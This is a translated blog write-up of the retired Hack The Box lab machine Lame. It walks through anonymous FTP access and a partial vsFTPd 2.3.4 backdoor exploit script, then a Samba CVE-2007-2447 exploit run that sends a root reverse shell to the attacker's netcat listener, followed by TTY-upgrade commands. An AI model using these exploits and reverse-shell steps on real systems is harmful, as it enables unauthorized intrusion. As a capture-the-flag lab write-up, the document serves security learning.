This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
From today onwards, I will regularly publish write-ups of retired Hack The Box machines. It is Lame’s turn, an Easy machine where we gain root access by exploiting the Samba vulnerability CVE-2007-2447.
Reconnaissance
Port Reconnaissance
The first step is to identify the open ports on the target machine using Nmap.
We can see that FTP is accessible with the credentials anonymous:anonymous, so let us see what we can find.
1 2 3 4 5 6 7 8 9 10 11 12 13
ftp 10.10.10.3 Connected to 10.10.10.3. 220 (vsFTPd 2.3.4) Name (10.10.10.3:void4m0n): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 229 Entering Extended Passive Mode (|||21114|). 150 Here comes the directory listing. 226 Directory send OK.
We did not find anything useful. Knowing that the FTP server is running vsFTPd 2.3.4, we can check whether that version is vulnerable.
from telnetlib import Telnet import argparse from signal import signal, SIGINT from sys import exit
defhandler(signal_received, frame): # Handle Any Cleanup Here print(' [+]Exiting...') exit(0)
signal(SIGINT, handler) parser=argparse.ArgumentParser() parser.add_argument("host", help="input the address of the vulnerable host", type=str) args = parser.parse_args() host = args.host portFTP = 21#if necessary edit this line
user="USER nergal:)" password="PASS pass"
tn=Telnet(host, portFTP) tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line tn.write(user.encode('ascii') + b"\n") tn.read_until(b"password.") #if necessary, edit this line tn.write(password.encode('ascii') + b"\n")
We run the script as python3 49757.py 10.10.10.3, but the backdoor does not connect. We need to find another potential attack vector.
Samba
Looking at the Samba version reported by Nmap, we have 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP). We search for a vulnerability affecting this version.
It appears to be vulnerable. A little research reveals that the relevant CVE is CVE-2007-2447. INCIBE has a report on the vulnerability if you would like to examine it. Because we do not want to rely on Metasploit, we search GitHub for a script that exploits this vulnerability.
This GitHub repository contains a Python script that can establish a reverse shell. The author explains the vulnerability on their blog.
python3 usermap_script.py 10.10.10.344510.10.16.31234 [*] CVE-2007-2447 - Samba usermap script [+] Connecting ! [+] Payload was sent - check netcat !
As the script suggests, we check whether the reverse shell connected.
1 2 3 4 5
nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.16.3] from (UNKNOWN) [10.10.10.3] 58132 whoami root
Spawning a TTY
Perfect! We are root and could already retrieve user.txt | root.txt, but as usual, we spawn a fully interactive TTY so that we can work more comfortably.
1 2 3 4 5 6 7
script /dev/null -c bash root@lame:/# ^Z [1] + 6995 suspended nc -lvnp 1234 ❯ stty raw -echo; fg [1] + 6995 continued nc -lvnp 1234 *************************En este momento debemos poner [reset xterm] no se nos mostrará ningún texto en pantalla, presionamos enter root@lame:/#
We can now work properly with Ctrl+C, command history, arrow keys and so on.
Flags
We retrieve the flags from their respective directories.